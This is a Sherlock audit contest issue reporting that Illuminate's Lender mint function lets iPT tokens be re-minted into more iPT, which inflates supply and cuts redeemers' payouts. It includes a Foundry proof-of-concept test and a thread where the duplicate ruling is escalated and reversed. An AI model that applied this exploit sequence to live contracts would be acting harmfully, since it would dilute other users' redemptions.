search

sherlock-audit / 2022-10-illuminate-judging

3 stars 0 forks source link

Jeiwan - Users can receive less tokens during redeeming due to iPT inflation in the `mint` function #213

Closed sherlock-admin closed 2 years ago

sherlock-admin commented 2 years ago

Jeiwan

high

Users can receive less tokens during redeeming due to iPT inflation in the mint function

Summary

Users can receive less tokens during redeeming due to iPT inflation in the mint function

Vulnerability Detail

The mint function of Lender mints new iPT tokens when iPT tokens are deposited (Lender.sol#L270-L288). This inflates the supply of iPT tokens, which impairs iPT tokens redemption: redeemers will get a smaller share of the underlying tokens (Redeemer.sol#L422).

Impact

An attacker can intentionally inflate the supply of iPT tokens of a specific maturity and reduce the number of underlying tokens redeemers will get during redeeming.

Code Snippet

// test/fork/Lender.t.sol
function testMintIPTInflation_AUDIT() public {
    vm.startPrank(msg.sender);
    IERC20(Contracts.ELEMENT_TOKEN).approve(address(l), type(uint256).max);
    vm.stopPrank();

    deployMarket(Contracts.USDC);
    runCheatcodes(Contracts.USDC);
    deal(Contracts.ELEMENT_TOKEN, msg.sender, startingBalance);

    // First, the attacker obtains some iPT tokens.
    l.mint(uint8(3), Contracts.USDC, maturity, startingBalance);

    address ipt = mp.markets(Contracts.USDC, maturity, 0);
    assertEq(startingBalance, IERC20(ipt).balanceOf(msg.sender));
    assertEq(0, IERC20(ipt).balanceOf(address(l)));

    IERC20(ipt).approve(address(l), type(uint256).max);

    // Then, the attacker deposits the iPT tokens and mints new iPT tokens.
    l.mint(uint8(0), Contracts.USDC, maturity, startingBalance);

    // Attacker's balance hasn't changed; Lender's balance has increased.
    assertEq(startingBalance, IERC20(ipt).balanceOf(msg.sender));
    assertEq(startingBalance, IERC20(ipt).balanceOf(address(l)));

    l.mint(uint8(0), Contracts.USDC, maturity, startingBalance);

    // Lender's balance has increased even more, although the attacker used the same tokens.
    assertEq(startingBalance, IERC20(ipt).balanceOf(msg.sender));
    assertEq(startingBalance * 2, IERC20(ipt).balanceOf(address(l)));

    // The underlying tokens are not transferred in these mints, so the attacker pays only tx cost.
}

Tool used

Manual Review

Recommendation

Consider disallowing minting of iPT tokens.

Duplicate of #108

sourabhmarathe commented 2 years ago

Duplicate of #208.

KenzoAgada commented 2 years ago

Escalate for 50 USDC This is not a duplicate of #208. 208 is about lending or minting after maturity. This issue is specifically about minting-ipts-through-ipts. At the moment there are duped to #238 but as hyh correctly escalated there, they need their own topic.

sherlock-admin commented 2 years ago

Escalate for 50 USDC This is not a duplicate of #208. 208 is about lending or minting after maturity. This issue is specifically about minting-ipts-through-ipts. At the moment there are duped to #238 but as hyh correctly escalated there, they need their own topic.

You've created a valid escalation for 50 USDC!

To remove the escalation from consideration: Delete your comment. To change the amount you've staked on this escalation: Edit your comment (do not create a new comment).

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

Evert0x commented 2 years ago

Escalation accepted

sherlock-admin commented 2 years ago

Escalation accepted

This issue's escalations have been accepted!

Contestants' payouts and scores will be updated according to the changes made on this issue.